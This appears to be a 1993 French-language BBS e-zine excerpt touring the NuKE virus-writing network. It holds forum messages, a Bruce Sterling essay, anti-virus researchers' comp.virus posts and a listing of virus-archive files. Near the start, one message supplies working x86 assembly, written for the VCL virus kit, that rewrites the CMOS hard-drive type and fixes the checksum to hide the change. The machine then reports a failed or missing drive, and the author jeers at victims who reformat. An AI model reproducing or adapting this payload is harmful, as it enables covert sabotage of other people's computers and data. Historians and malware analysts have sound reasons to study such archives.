3D B0 00 8C DA 89 E 02D0 16 89 02 8C C2 8E DA 8B 16 85 02 CD 21 73 25 BA E 02E0 EE 02 B4 09 CD 21 8B 16 85 02 CD 21 CD 20 20 43 E 02F0 6F 75 6C 64 20 6E 6F 74 20 6F 70 65 6E 20 46 69 E 0300 6C 65 20 24 A3 87 02 B4 09 8B 16 85 02 CD 21 BA E 0310 1D 03 CD 21 8B 16 89 02 8E DA EB 3A 90 0D 0A 20 E 0320 50 6F 73 73 69 62 6C 65 20 49 6E 74 65 72 72 75 E 0330 70 74 73 20 46 6F 75 6E 64 20 0D 0A 20 20 20 4E E 0340 6F 2E 20 20 20 54 69 6D 65 73 20 4F 63 63 75 72 E 0350 72 65 64 0D 0A 24 B4 3F B9 00 02 8B 1E 87 02 BA E 0360 15 04 CD 21 73 22 BA 6F 03 B4 09 CD 21 CD 20 20 E 0370 42 61 64 20 66 69 6C 65 20 72 65 61 64 20 72 65 E 0380 70 6F 72 74 65 64 20 24 3D 00 00 7F 33 B4 3E CD E 0390 21 BF 00 00 BB 00 00 8A 9D 83 01 83 FB 00 74 15 E 03A0 E8 51 00 A3 96 02 8B DF E8 49 00 A3 8F 02 BA 8C E 03B0 02 B4 09 CD 21 47 81 FF FF 00 75 DB CD 20 CD 20 E 03C0 BE 15 04 8B C8 83 F9 00 74 8C 8A 04 46 49 80 3E E 03D0 8B 02 00 7F 0B 3C CD 75 EC C6 06 8B 02 01 EB E5 E 03E0 32 E4 88 26 8B 02 8B F8 8A 9D 83 01 FE C3 88 9D E 03F0 83 01 EB D1 33 C0 8A E3 80 E4 0F 80 C4 30 80 FC E 0400 39 7E 03 80 C4 07 B1 04 8A C3 D2 E8 04 30 3C 39 E 0410 7E 02 04 07 C3 00 00 00 00 00 00 00 00 00 00 00 E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0500 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0610 00 00 00 00 00 RCX 0515 W Q --- Msged/sq * Origin: Cyber City (40:2/2) Msg #: [311/365] Base: ASM Programming [NuKENeT] Date : 23 Jan 93 23:34:00 Stat: Sent From : Screaming Radish To : Rock Steady Title: VCL routine Hello Rock! I promised you a routine to modify the drive types in cmos, so having a hour to spare tonight I figured I may as well keep that promise. The follow routine has been tested with the VCL 1.0 and as far as I can tell works fine. What this one does is change the cmos drive type for any defined drives and recalculates the cmos checksum so there is no telltale cmos failure message. The net effect is the bios will either report a hard drive failure just like it would with a dead drive or display a "no operating system" message. No data is actually lost on the drive unless the user is a fool and reformats, if they are that stupid the deserve to lose data ;-) Screaming ======================================================================= cld push ds ; save ds xor ax,ax ; zero ax mov ds,ax ; ds = 0000h mov si,046ch ; ticks since midnight lodsw ; get lsw mov bx,ax ; save it in bx lodsw ; get msw or bx,ax ; combine it with lsw xor bl,bh ; combine into a byte pop ds ; restore ds mov dx,70h ; dx = register latch address mov al,2eh ; msb of checksum out dx,al ; latch register address jmp $+2 ; short delay inc dx ; dx = register r/w io address in al,dx ; read register mov ch,al ; msb to ch dec dx ; dx = register latch address mov al,2fh ; lsb of checksum out dx,al ; latch register address jmp $+2 ; short delay inc dx ; dx = register r/w io address in al,dx ; read register mov cl,al ; lsb to cl dec dx ; dx = register latch address mov al,12h ; hard drive type register ; bits 7-4 = first drive ; bits 3-0 = second drive out dx,al ; set register jmp $+2 ; short delay inc dx ; dx = register r/w io address in al,dx ; read register mov bh,al ; save drive types sub cx,ax ; subtract from checksum and al,0fh ; mask for second drive jnz cmos_1 ; jmp if 2 hard drives and bl,0f0h ; mask out 2nd drive modifi cmos_1: xor bl,bh ; modify drive types xor bh,bh ; zero bh for checksum add add cx,bx ; update checksum dec dx ; dx = register latch address mov al,12h ; drive type register out dx,al ; set register jmp $+2 ; short delay inc dx ; dx = register r/w io address mov al,bl ; new drive types out dx,al ; write register dec dx ; dx = register latch address mov al,2eh ; msb of checksum out dx,al ; set register jmp $+2 ; short delay inc dx ; dx = register r/w io address mov al,ch ; msb of new checksum out dx,al ; write register dec dx ; dx = register latch address mov al,2fh ; lsb of checksum out dx,al ; set register jmp $+2 ; short delay inc dx ; dx = register r/w io address mov al,cl ; lsb of new checksum out dx,al ; write register ======================================================================= --- GoldED 2.40 * Origin: The House of the Screaming Radish [NuKE] (111:950/75) ------- On pourrait passer des heures s'abreuver ces sources de savoir que sont les mecs de NukE, non? Allez, encore deux messages, tirs des autres sections. Le premier parce qu'il est rigolo, et le deuxime parce qu'il s,agit d'un indit de Bruce Sterling! Y! ------- Msg #: [172/196] Base: Phreaking Away [NuKENeT] Date : Thu 21 Jan 1993 9:51a Stat: Sent Local From : Ned239 To : Public Enemy Title: Re: Hmm... Reply: This message is a reply to #169 and has 1 reply Don't know about Canada, but it is legal to listen on cordless conversations in the U.S. The recent trouble Prince Charles was in stemmed from the interecpt of a cordless conversation..... ned239 Q. Is Windows a virus? A. No, Windows is not a virus.Here's what viruses do: 1. They replicate quickly -- okay, Windows does that. 2. Viruses use up valuable system resources, slowing down the system as they do so -- okay, Windows does that. 3. Viruses will, from time to time, trash your hard disk -- okay, Windows does that too. 4. Viruses are usually carried, unknown to the user, along with valuable programs and systems. Sigh.. Windows does that, too. 5. Viruses will occasionally make the user suspect their system is too slow (see 2) and the user will buy new hardware. Yup, that's with Windows, too. Maybe Windows is a virus.......Nope! There is a difference! Viruses are well supported by their authors, are frequently updated,and tend to become more sophisticated as they mature.Therefore, windows is not a virus. ------- But Windows take 4,867,045 Bytes more than a virus... ------- Msg #: [267/284] Base: General Topics [NuKENeT] Date : Sat 30 Jan 1993 9:31a Stat: Sent Local From : Ned239 To : All Title: interesting info check this out; Topic 16: Bruce Sterling Live at Mondo.... #123: Bruce Sterling (bruces) Sun, Aug 23, '92 (15:06) 56 lines COMPUTER AS FUROSHIKI "Computer as furoshiki" is a highly speculative vision of the personal computer as it might evolve if freed from certain current material constraints. The furoshiki is an intimate and ubiquitous accessory to Japanese daily life. It's nothing more than a large square of tough, well-made cloth, usually with a handsome pattern. The furoshiki is used, among other purposes, as a grocery bag, a book-tote, and a decorative wrapper for ceremonial gifts. In its simplicity and multiple uses it is little different from a cowboy's bandanna, except that the skill in wrapping and knotting furoshikis is more arcane. The computer-as-furoshiki is the computer as a large square of lightweight, flexible cloth. It is not, however, "cloth" as that material is currently understood. The furoshiki's display screen is formed by thin bands of color-emitting optical fibers, which are wide enough and bright enough to mimic the scan-lines of a video display terminal. These display-fibers are interwoven with other fiber-optics carrying data. A second kind of fiber is densely interwoven; it consists of room-temperature superconductive wire, possibly a novel form of buckminsterfullerene for strength and flexibility. This highly-charged net of superconductors serves as a literal power-grid. The third fiber is some currently-unknown form of piezoelectric filament that can contract, relax, and therefore warp and knot itself in response to precise electrical charges deployed along its length. A fourth form of fiber serves as a radio antenna and communications grid. One section of the cloth can be radically stiffened to serve as the diaphragm for an audio speaker. Computation, memory, and movement are carried out by photonic, photoelectronic, and electronic chips composed of custom-built artificial diamond for low cost and strength. If the tensile fibers are composed of organic proteins (which would seem likely), then the computer-as-furoshiki consists mostly of carbon. The device is operated with voice commands and touch, and possibly gesture, through a similarly woven linked glove. The computer-as-furoshiki is capable of limited movement. Early versions might fold themselves up like a gentleman's handkerchief; later models would resemble aluminum foil or Saran Wrap. Advanced versions can fly. Although this computer lacks direct video input, it might be capable of optical character recognition if placed on a page, or of image-scanning if placed on a graphic. When placed on light-sensitive paper, or film, it generates hard-copies. This computer might displace paper as a medium by usurping not merely the information of paper but the physical properties of paper as well. When one's head is wrapped completely in the furoshiki, it becomes a virtual-reality rig. When not in use, the furoshiki is worn, as a scarf, tie, turban, or, or course, the Console Cowboy's bandanna. Mainframes can be used as pup-tents, supercomputers as Big Tops, for a late twenty-first-century multimedia circus. something to get the neurons firing..... ned239 ___________ C'tait un premier survol du NuKENeT, mesdames et messieurs. Nous allons maintenant descendre un peu au ras du sol, histoire de survoler la messagerie locale de Cybernetic Violence. Attachez vos ceintures! ------- Msg #: [82/82] Base: General Msgs [LOCAL] Date : Fri 12 Feb 1993 9:45p Stat: Public From : A K 4 7 #122 To : All Title: X rated GIFS....... If there is anyone out there that knows the #'s to any boards that have a LOT of X rated GIFS, please post the area codes and #'s here. Thanks. ------- Mmmmmmpppppppffffff!!! Bon, ok! Ce message est local... Mais quand mme, on pourrait l'aider ce jeune adolescent en rut... Essaie l'AGBE! (Mchante gang de pattes folles)... Un simple commentaire: 1- A-t-on besoin de payer 0,30$ / Minute de Ld Mtl pour voir ce genre de commentaire? No! Never! Ahhhhhhhhhhhhh! Ca fait du bien d'tre mchant un peu! Je commencais m'inquiter, force de ne pas pouvoir placer une pique! Faut dire qu'avec Cybernetic Violence, il n'y a pas beaucoup de conneries sur ce board. C'est une denre rare... Non, srieux, les mecs de NukE ont pouss la perversit jusqu' espionner l'ennemi, les gars de l'AV (anti-virus). Pour ce faire, ils ont mis sur leur Net les posts du site d'Internet o s'crivent les Sara Gordon et autres virus-busters! Msg #: [4/165] Base: Comp.Virus (Internet)[NuKENeT] Date : 13 Jan 93 17:13:43 Stat: Sent From : padgett Title: What is a virus ? From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson) There have been a number of learned comments on "beneficial" viruses and the horrors thereof. I have not read Dr. Cohen's papers (if they are available on the net, I would appreciate either FTP instructions or their E-Mail - not being at a University has its limitations), however I do have some opinions. First, a virus appears to be executable code that propagates by attaching itself to other programs. If it were a stand alone (not requiring a host) it would be a Worm. If it did not propagate, it might be a logic bomb, a trojan horse, or simply a program, but it would not be a virus. Propagation is part of the definition. Obviously companion & path viruses do not meet this test since they do not attach themselves to other programs, rather they spoof the OS into executing them instead of the requested program. MBR and BSI infections are questionable. AZUSA in particular replaces the entire MBR code and is probably more properly termed a logic bomb than a virus (of course the popular definition calls *all* malicious software viruses, but we are talking laboratory definitions now). Therefore, to be strictly a virus, a program (xA) must affect a change to another program (B) that adds the functionality of A to (B) such that the function of a third program (C) can also have the functionality of (A) added to it by the new program (BA). In other words when xA executes in the presence of B, B becomes BA. When BA executes in the presence of C, C becomes CA (*not* CBA). Further, to be a *beneficial* virus, BA must retain all of the functionality of B unless some function(s) is to be specifically (and documentedly) modified. Here the Turing Halting Rule has a new effect: A has no way of determining prior to the change of a random program B to BA whether this change will be detrimental to the functionality of B. Period. Now many people including myself have pointed to COPY as an example of a virus. On reflection this is not true since while it is possible to say COPY B.COM+COPY.COM B.COM, this will not add the functionality of COPY.COM to B.COM. COPY cannot propagate itself. It can cause programs to fail if used this way but that in itself does not make COPY a virus. Further, we have discussed the use of a program on a LAN to update Client programs, but these do not meet the test since (C) cannot be affected, only (B). Further since (B) has just been updated or replaced and cannot update anything else once "fixed" this does not meet the propagation test of a virus. Consider the recent CHKDSK furor. I posted a simple detection mechanism and "fix" that could easily be put into a program that might be executed as searched for CHKDSK.EXE. If found, it is checked. If the old one, the fix is applied. THIS IS NOT A VIRUS. The original program's function is not propagated. (B) did not become (BA), it became (B'). Certainly, if poorly written, the update could cause damage and the public might call it a virus but incorrectly. Therefore, if we accept that to be a virus, the test of A + B = BA and BA + C = CA must be met, then the Turing Halting Rule makes the general case of a beneficial virus (cannot cause any harm in any environment) impossible. Enough, Padgett --- * Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0) Msg #: [8/165] Base: Comp.Virus (Internet)[NuKENeT] Date : 14 Jan 93 02:10:19 Stat: Sent Title: What do you want? From: sara@news.rn.com (Sara Gordon) Recently I posted request for info from anti-virus product evaluators/services or persons with opinions on them. Thanks to all who responded. Now, I would like to inquire of anti-virus product users/purchasers (and anyone who would care to respond): 1. What are the three most important factors you consider when purchasing an anti-virus product? When your responses reference technical capabilities, please be as specific as possible in defining the capability which is important to you. Please e-mail the responses, which will be categorized and published as part of a little project i've undertaken to evaluate the 'evaluators' :) For those persons who asked me what kind of responses I have gotten from the evaluators and product developers, it is this way: so far the evaluators -for the most part- are not interested/willing to say - -how- they evaluate anti-virus products. I am specifically interested in finding information such as a.) what provisions are used to evaluate heuristic modes of a-v products b.) what provisions are taken/made in dealing with false positives c.) exactly (EXACTLY) what kind of machines are these evaluations performed using? drives? boxes? hardcards? what video displays, what dos versions? This is relative only to standalone PC's, but even with this limitation, I have had remarkable non-success in finding out exactly who is doing what, and how they are doing it. If you have any information you could share with me, I would appreciate an e-mail from you !! p.s. almost all people when asked what is the major problem with evaluating state: not enough viruses, not enough time. some state too many viruses, not enough time. concensus appears NOT ENOUGH TIME. - -- # "talk to me about computer viruses............" # fax/voice: 219-277-8599 sara@gator.use.com # data 219-273-2431 SGordon@Dockmaster.ncsc.mil # fidomail 1:227/190 vfr@netcom.com --- * Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0) Date : 14 Jan 93 10:55:12 Stat: Sent From : dklefkon Title: Contents of conference proceedings, Ides of March From: dklefkon@well.sf.ca.us (Richard W. Lefkon) Nine days ago, FCWturing posted a protest to Virus-L concerning the current ban on publishing viruses within the Proceedings of the International Computer Security & Virus Conference. I'm program chair and will try to be brief explaining what and why. Those interested in the conference can call 800-835-2246 x190 and get further informatin about March 10-12 in New York City. 1. The conference and its committee are NOT spokespersons for DPMA/ACM/IEEE or the other five societies and five trade publications involved. The local DPMA chapter hosts the conference and organizations like ACM-SIGSAC and IEEE Computer Society are cooperating sponsors. As an example, IEEE sponsors literally HUNDREDS of worthwhile seminars and conferences per year. But if IEEE wants to take a position, its appropriate board will do that, not a conference. Incidentally, the most recent position taken by the DPMA chapter was in opposition to New Jersey programmer licensing legislation. While this particular 1991 stance eventually did bubble up to the top, the chapter does not speak for DPMA at large and the conference does not speak for the chapter. 2. The ban on publishing viruses in the proceedings was put into effect with last year's (5th International) conference. It resulted from a post-mortem e-mail discussion by the conference committee based on contents of the 1990 (4th) gathering. Mr. Fred Cohen is a valued memember of the 16-person conference committee, but at the time of the deliberations he (like me a year before) wasn't on a regular e-mail host. Pretty clearly, he is now. And he WILL have the chance to influence the rules that govern NEXT year's (7th International) conference. 3. Rationale. I don't necessarily agree with every punctuation mark of the position concerning publishing code fragments, but it WAS a vote/consensus of the conference committee, approximately thus: a. By definition, those who attend this conference have the resources to take off 2 or 3 days from work and pay the modest registration fees. Especially those who have attended before, they are pretty well-connected in the technical community and if really motivated could obtain the stuff you might not want your 5-year-old to fool with. Among the 20% who are full-time security people, this is especially true - and one reason why the anti-virus products were fully prepared in '92 for "Michelangelo" was that most of the major players had representatives here in '91 on March 14 when Roger Riordan of Australia laid out how he had discovered the thing a month beforehand, during his scheduled speech at the conference. b. Those whose ONLY contact with the conference is the Proceedings, could very well have considerably less ability to "get the code, no matter what." If the Proceedings is on the shelf of their library, e.g., it may be their first and only contact with viruses. So why give the true beginners a practice set of viruses? c. Therefore, last year and this year, speakers who dissect York, are permitted to distribute a non-Proceedings handout to attendees. d. Rest assured, that "c" necessitated a good-will compromise on the part of those at the other end of the opinion spectrum from Fred. e. This April, procedures for the 1994 conference will be fixed by consensus of the committee members. They will take into account the experiences of the March 10-12 1993 sessions. Anyone who doubts that the committee responds to realities experienced, has only to be reminded that THIS conference will be managed by Expoconsul, the managers of DEXPO and other big events - NOT by the chapter volunteers who did this task in previous years. That's because, based on feedback, the committee was unanimous in its sentiment that "Ides of March" clearly hundreds of attendees past the point where it could be run properly by amateurs. --- * Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0) ------- Hep les mecs... C'est dj tout pour les messages... Pas pour dire qu'y en a pas beaucoup, NOT!! , Y en a des tonnes... Le NuKeNet est ax sur le Virus Talking, comme vous l'avez vu... Que dire de plus... Cot fichiers, Virus, CDC, PP, CPI Newsletters, LOL, CUD, PHRACK... Et quelques autres... Tirez vos propres conclusions. Voici les sectins fichiers : NNN:Flag:Title :NNN:Flag:Title ===:====:==============================:===:====:====================== 0 *--A [ UPLOAD ] 1 *--A [ Anti-Virii ] 2 *--A [ Virus # To L ] 3 *--A [ Virus M To Z ] 4 *--A [Original Virus Sources] 5 *--A [ Disassembled Viruses] 6 *--A [Virus Magazines & Text] 7 *N-A [ NuKE Warez ] -N-A [ NuKE Private ] 8 *--A [H/P Magazines 'n Texts] 9 *--A [ H/P Utilities ] 10 *--A [ Phreaking Related ] 11 *--A [Anarchy Progs. & Texts] 12 *--A [ PHRACK Inc. Magazine] 13 *--A [ Cult Of The Dead Cow ] 14 *--A [ CryPt Newsletter ] 15 *--A [ CPI Newsletter ] 16 *--A [ CUD Magazine ] 17 *--A [ LOL Magazine ] 18 *--A [ PPP Magazine ] 19 *--A [ Virus-L Digest ] 20 *--A [ Misc. Files ] On parle encore virus, l. Voici un chantillon des sections virus, et de ce qu'on peut y trouver... [ Virus # To L ] #2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Filename.Ext Bytes Description -------- --- ------- ------------------------------------------------------- !J4J .ZIP 1 50 Plaice (1273 - Generation 1 -) Virus 100YEARB.ZIP 33 50 100-Year Virus Strain B (Frodo) [4096] 1022 .ZIP 3 50 Fellowship Virus [Fellow] 1024-B .ZIP 3 50 Nomenklatura (1024-B) [Nom] 1024PRSC.ZIP 1 50 PrtSc 1024 Virus [PS10] 1033 .ZIP 12 50 Fax Free (Pisello/1030) Virus [1030] 1049 .ZIP 1 50 1049 Virus [Alf] 1075 .ZIP 1 50 Zaragoza 1075/Minsk Virus [Zar] 10PASS3 .ZIP 1 50 10 Past 3 (748) Virus [748] 1193 .ZIP 2 50 Copyright Virus (1193) [1193] 1210 .ZIP 5 50 Prudents 1210 Virus [1210] 1244 .ZIP 2 50 1244 Virus [1244] 1253 .ZIP 2 50 1253 Virus [1253] 1260 .ZIP 1 50 1260 Virus [1260] 1381 .ZIP 1 50 Internal (1381) Virus 1530 .ZIP 3 50 Rape 1530 Virus [1530] 1554 .ZIP 1 50 1554 Virus [1554] 1554B .ZIP 5 50 1554 Strain B Virus [1554] 1559 .ZIP 18 50 1559 Virus 1575 .ZIP 2 50 1575 (Green Caterpillar) Virus [15xx] 1575-C .ZIP 5 50 1575-C (Green Caterpillar) Virus [15xx] 15APR .ZIP 1 50 Murphy - Swami Generation 1 - [Murphy] 15XX .ZIP 31 50 1575 Virus [15xx] 1600 .ZIP 1 50 Jerusalem Virus (1600) [Jeru] 1605 .ZIP 3 50 Jerusalem Virus (1605) [Jeru] 1701B .ZIP 1 50 1701 Virus, Strain B [170x] 1701MUTA.ZIP 2 50 1701 Mutation 1704 .ZIP 4 50 Cascade Virus (1704) [170X] 1704-B .ZIP 3 50 1704 Virus, Strain B [170x] 1704-C .ZIP 3 50 Cascade Virus (1704-C) [170X] 1704FRMT.ZIP 2 50 Cascade Virus (1704-Format) [170X] 170X .ZIP 4 50 170X Virus [170x] 17Y4 .ZIP 8 50 Cascade 17Y4 Virus [170X] 1963 .ZIP 4 50 1963 Necropolis Virus [1963] 1992 .ZIP 1 50 1992 Virus 1992-SK .ZIP 1 50 Skism 1992 Virus 1992_B .ZIP 1 50 1992 Virus, Strain B 2144 .ZIP 2 50 USSR-2144 Virus [U2144] 2480-2 .ZIP 1 50 2480-2 (Family-M/Crew) Virus [FM] 257 .ZIP 1 50 Kemerovo Virus (257) [Kem] 2623 .ZIP 8 50 2623 Virus [2623] 30 .ZIP 1 50 Mini Virus [M45] 3012 .ZIP 4 50 Jerusalem (AntiCad-3012/Plastique) [Plq] 307 .ZIP 1 50 Timid Virus (307) [Tmd] 3103 .ZIP 4 50 USSR-3103 Virus [Svc50] 311 .ZIP 0 50 USSR-311 Virus [U311] 312VIRUS.ZIP 13 50 312Virus :This one is NOT exactly a Virus.. But it is FUNNY! :Is able to run the poor sucker's Phone Bill :through the roof! 334-2 .ZIP 3 50 334-2 Virus [ARCV] UnScaned COM 337 .ZIP 0 50 337 Virus [337] 3445 .ZIP 3 50 3445-Stealth Virus [3445] 382 .ZIP 0 50 382 Virus [382] 4 .ZIP 2 50 4 Virus [Con] VCL 405 .ZIP 0 50 405 Virus [Burger] 4096 .ZIP 3 50 4096 Virus [4096] 483 .ZIP 0 50 483 Fam3 Virus (Resurrect) [F3] 486 .ZIP 2 50 486 Family Virus (Rage) [FM] 492 .ZIP 0 50 USSR-492 Virus [U492] 4MAT2 .ZIP 1 50 4 MAT 2 Virus 512 .ZIP 0 50 512 Virus [512] 512-B .ZIP 0 50 512 Virus, Strain B [512] 512-E .ZIP 2 50 512 Strain E Virus [512] 512-F .ZIP 2 50 512 Strain F Virus [512] 512-X .ZIP 0 50 512 Strain A Virus [512] 5120 .ZIP 4 50 5120 Virus 516 .ZIP 0 50 USSR-516 Leapfrog Virus [Leap] 529 .ZIP 2 50 529 Virus [529] 529-1 .ZIP 0 50 529 Virus, Second Strain [529] 529-2 .ZIP 4 50 Piter 529 Virus [529] 535 .ZIP 0 50 535 Virus [VHP] 537 .ZIP 1 50 537 Family-Q Virus (Burger) [FQ] 541 .ZIP 0 50 541 Virus [Burger] 644 .ZIP 2 50 644 Lisbon Virus (Vienna) [Lisbon] 666 .ZIP 1 50 666 Virus (Rock Steady) 666-B .ZIP 1 50 666 Virus, Strain B (Rock Steady) [RKO] 696 .ZIP 0 50 696 FamR Virus [FR] 707 .ZIP 2 50 USSR-707 Virus 711 .ZIP 2 50 711 Family Virus (13 Minutes) [FM] 712 .ZIP 2 50 712 UNK Virus (Fumble) [UNK] 7808 .ZIP 5 50 7808 Virus (Pascal) [7808] 789 .ZIP 1 50 789 Zaragoza Virus (FileHider) [Zar] 7SON .ZIP 0 50 7thSon Virus [7s] 7SON2 .ZIP 1 50 7th Son II (332 Generation) [F-Prot] 801 .ZIP 6 50 Dot-801 Virus (StarDot) [I-F] 812 .ZIP 1 50 812 JW2 Virus (Jabberwocky) [Jab] 817 .ZIP 1 50 DOt-801 Virus (StarDot-Modified) [I-F] 855 .ZIP 32 50 855 Virus (November 17th) [855] 905 .ZIP 1 50 905 Virus [905] 911 .ZIP 2 50 911 Armagedon Virus [Arma] 981 .ZIP 16 50 981 Fichv Virus [FCH] 994 .ZIP 2 50 994 Nina Virus (DotEater) [Nina] ACME .COM 1 50 ACME companion virus - from Cryptletter 9 ADA .ZIP 3 50 Ada Virus [Ada] ADOLPH .ZIP 2 50 Adolph Virus [V2P6] ADVENT .ZIP 2 50 Advent Virus [SysLock] AGIPLAN .ZIP 1 50 AgiPlan Virus [AGI] AIDS@ .ZIP 10 50 Aids Virus [N1] AIDSII .ZIP 5 50 AIDS ][ Virus [A2] AIRCOP .ZIP 1 50 AirCop Virus AIRCOP2 .ZIP 1 50 AirCop ][ Virus [Dr2] AKUKU .ZIP 1 50 Akuku Virus [Akuku] ALA-1652.ZIP 2 50 Ala Virus [Alabama] ALABAMA .ZIP 1 50 Alabama Virus (1560) [Alabama] ALEMEDA .ZIP 10 50 Alemeda Virus ALLO .ZIP 7 50 Allo Virus AMBULANC.ZIP 1 50 Ambulance Car Virus [RedX] AMILIA .ZIP 2 50 Amilia Virus (Rock Steady) [Murphy] AMOEBA .ZIP 3 50 1392 Amoeba Virus [1392] AMOEBA-2.ZIP 1 50 Amoeba ][ Virus [1392] AMST-299.ZIP 1 50 Amstrad 299 Virus [Pix] AMST-345.ZIP 1 50 Amstrad 345 Virus [Pix] AMST-740.ZIP 1 50 Amstrad 740 Virus [Pix] AMST-847.ZIP 1 50 Amstrad 847 Virus [Pix] AMST-850.ZIP 1 50 Amstrad 850 Virus [Pix] AMST-852.ZIP 0 50 Amstrad 852 Virus [Pix] AMSTRAD .ZIP 0 50 Amstrad Pure Strain Virus [Amst] AMUSAK .ZIP 6 50 Amusak Virus ANARKIA1.ZIP 1 50 Anarkia Virus [Jeru] ANARKIA2.ZIP 2 50 Anarkia-2 (Jeru Related) [FU] ANNA .ZIP 3 50 Anna Virus [ARCV] UnScaned COM ANTHRAX .ZIP 1 50 Anthrax Virus [Atx] ANTIC10K.ZIP 19 50 Famous 10k Virus ANTICAD .ZIP 1 50 AntiCad Virus (1253) [1253] ANTICST .ZIP 1 50 Anti-Christ Virus [Pest] ANTIFAG .ZIP 1 50 Anti-Fag Virus [VHP] ANTIFIRE.ZIP 0 50 Anti-Fire Virus ANTIMON .ZIP 2 50 Antimon Virus [1453] ANTITEL .ZIP 1 50 Anti-Tel Virus ( Boot Sector ) [A-Vir] ANTI_D .ZIP 2 50 Anti_D (or FamR) Virus [FR] ANTI_DAF.ZIP 3 50 Anti DAF virus AP-400 .ZIP 0 50 Anti-Pascal 400 Virus [AP] AP-440 .ZIP 0 50 Anti-Pascal 440 Virus [AP] AP-480 .ZIP 0 50 Anti-Pascal 480 Virus [AP] AP-529 .ZIP 0 50 Anti-Pascal 529 Virus [AP-2] AP-605 .ZIP 0 50 Anti-Pascal 605 Virus [AP-2] APOC .ZIP 3 50 Apocalypse Virus [Jeru] APOCII .ZIP 2 50 Apoc ][ Virus [2000] ARCV-1 .ZIP 2 50 ARCV #1 [ARCV] UnScaned COM ARCV-2 .ZIP 2 50 ARCV #2 [ARCV] UnScaned COM ARCV-3 .ZIP 2 50 ARCV #3 [ARCV] UnScaned COM ARCV-4 .ZIP 2 50 ARCV #4 [ARCV] UnScaned COM ARCV-5 .ZIP 2 50 ARCV #5 [ARCV] UnScaned COM ARCV-6 .ZIP 1 50 ARCV #6 [ARCV] UnScaned COM ARCV-7 .ZIP 2 50 ARCV #7 [ARCV] UnScaned COM ARCV-8 .ZIP 2 50 ARCV #8 [ARCV] UnScaned COM ARCV-9 .ZIP 2 50 ARCV #9 [ARCV] UnScaned COM ARCV93 .ZIP 2 50 ARCV'93 Virus [ARCV] UnScaned ARCVSAND.ZIP 3 50 ARCV Snadwiich Virus [ARCV] UnScaned TSR-COM ARF .ZIP 1 50 Arf Virus (Parasite) [Par] ARF-B .ZIP 0 50 ARF Strain B Virus [VHP] ARMAGEDO.ZIP 1 50 Armaggedon Virus [Arma] ASHAR .ZIP 2 50 Ashar Virus (Brain-Dropper) [Drp] AT144 .ZIP 0 50 AT144 Virus [144] ATTENTN .ZIP 0 50 Attention Virus (USSR-394) [U394] AZUSA .ZIP 4 50 Azusa Virus BACKTIME.ZIP 0 50 Backtime Virus [BT] BADBOY .ZIP 1 50 Bad Boy Virus [BB] BADBOY2 .ZIP 1 50 Bad Boy Strain ][ Virus [BB] BADGUY-2.ZIP 0 50 BadGuy Virus Strain 2 (I-B) [IB] BADTASTE.ZIP 2 50 Badtaste Virus (Murphy) [Murphy] BANANA .ZIP 1 50 Banana Virus (Trivial) [OW] BANDIT .ZIP 1 50 Bandit Virus [Ban] BARCELON.ZIP 4 50 Barcelona Virus [Barc] BASICVIR.ZIP 5 50 Basic Virus BATVIR .ZIP 0 50 Batch File Virus BB .ZIP 0 50 Bad Brains Virus BEAST .ZIP 0 50 Beast-N-Black Virus [GenF] BEBE .ZIP 2 50 BEBE Virus [BeBe] BEDTIME .ZIP 4 50 Bedtime Virus BEEPER .ZIP 2 50 Beeper Virus [Beep] BEST .ZIP 1 50 Best Wish Virus [BWish] BFD .ZIP 3 50 BFD Virus [BFD] BLAZE .ZIP 0 50 Eternal Blaze Virus BLJEC3 .ZIP 0 50 Bljec-3 Virus [Blj] BLJEC4 .ZIP 0 50 Bljec-4 Virus [Blj] BLJEC5 .ZIP 0 50 Bljec-5 Virus [Blj] BLJEC6 .ZIP 0 50 Bljec-6 Virus [Blj] BLJEC8 .ZIP 0 50 Bljec-8 Virus [Blj] BLJEC9 .ZIP 0 50 Bljec-9 Virus [Blj] BLOOD .ZIP 0 50 Blood Virus [Blood] BLOODLUS.ZIP 1 50 Blood Lust Virus [Blus] BLOODY .ZIP 0 50 Bloody Virus ( Boot Sector ) [Bloody] BMONDAY 